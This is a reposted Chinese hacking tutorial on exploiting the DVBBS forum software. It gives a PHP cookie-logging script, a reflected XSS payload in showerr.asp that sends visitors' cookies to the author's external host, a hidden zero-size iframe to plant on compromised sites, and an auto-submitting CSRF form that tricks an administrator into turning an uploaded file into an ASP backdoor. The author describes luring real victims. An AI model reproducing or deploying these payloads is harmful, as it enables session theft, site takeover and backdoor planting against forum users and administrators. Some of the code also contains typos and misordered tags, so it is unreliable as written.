[转]关于DVBBS的跨站

作者:saiy 来源:http://www.wrsky.com/

最近无意逛论坛的时候发现了有些新手总在问关于跨站的问题,让人很郁闷的是,似乎大家都还在img标签的那个年代,那假设是dvbbs现在的版本呢?又怎么去利用跨站呢?
我们和img标签的年代久了,这样子的东西显然是不存在了,但是dvbbs很坚持的把跨站一直留着!
大家没发现吗?
其实在大家登陆论坛的时候假设密码错误你会看到
http://bbs.dvbbs.net/showerr.asp?BoardID=0&ErrCodes=12&action=%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2
这样的地址,呼,其实action后面是IE的编码,其实他们是"填写登录信息",我们把它改成首先我们在自己空间上建立一个文件,我用的是php,名为saiy.php,这个文件的内容是


<?php
$info = getenv("QUERY_STRING");
if ($info) {
$info=urldecode($info);
$fp = fopen("test.txt","a+");
fwirte($fp,$info."/n/n/n/n");
fclose($fp);
}
?>
 

这段代码是谁写的,我不记得了,我稍微改了一下,改为a+了,cookies保存在test.txt里,假设test.txt不存在则会自动建立它,所以不用管它了。
我们先来做一个拿cookies的页先。
代码为:

<meta http-equiv="refresh" content="0;url=http://bbs.dvbbs.net/showerr.asp?BoardID=0&ErrCodes=12&action=<script>document.location=http://www.77yan.com/saiy.php?'%2Bdocument.cookie'</script>
 

我们把它保存为hidden.html
呵,进入这个就会转到我空间,当然,会带着浏览者的cookies一起走~!!!!
当然,我们自然不能这样子就完工了,欺骗不了人的,我们必须给它看个页面,一个正常的页面。
其实我们可以用很多种方式,我这里使用的是框架!
首先我们可以利用哪天被我们入侵的站点,(呵呵,dvbbs上传漏洞可是死了一片喔)
在它首页里插上这么一句话:

<iframe frameborder=0 width='00%' height=00 scrolling=no src='_blank>http://www.77yan.com/hidden.html'>;</iframe>
 

这个框架是0高0宽的,你就别担心它会被发现啦~~~
这样,你只要把这个页给别人看,最好是三w的,呵呵,标题你随便给,只要说的好,一定会有人中招!!
我曾经在某黑客站点使用过,标题是"谁黑掉了这个站,报出名来"没想到进去看的人还贼多,呼~这是外话!
另外说到这里,就突然想说一下欺骗了,呵呵~其实要欺骗对方进了一个站,不只是能让他打开页面那么简单了,我们还可以叫他给我们提交数据,大家知道dvbbs有个备份功能吗?呵呵,其实,我们只要写个页面,欺骗管理员,它就可以给我们工作!
我们先去上传一个改了后缀的asp后门....
我们建立一个html页 代码为:

<form method="post" action="论坛网址/ADMIN_data.asp?action=BackupData&act=Backup">
<input type=hidden name=DBpath value="你传的图片的地址">
<input type=hidden name=bkfolder value=saiy>这里是目录名
<input type=hidden name=bkDBname value=saiy.asp>这里是文件名
<input type=submit value="确定">
<script language="javascript">
</form>
this.document.forms[0].submit()
</script>
 

只要你能欺骗管理员进入的话便会在他论坛目录下生成saiy/saiy.asp了。
当然,我们还可以制作其他的欺骗用的页来完成其他的需要,比如短消息之类的。
只要肯想,没有做不到的,只有想不到,没有做不到。。。
希望大家可以举一反三,思想不可以固化!

添加一点,可参考http://www.securityfocus.com/bid/14223/info关于DVBBS的跨站

阅读更多

没有更多推荐了,返回首页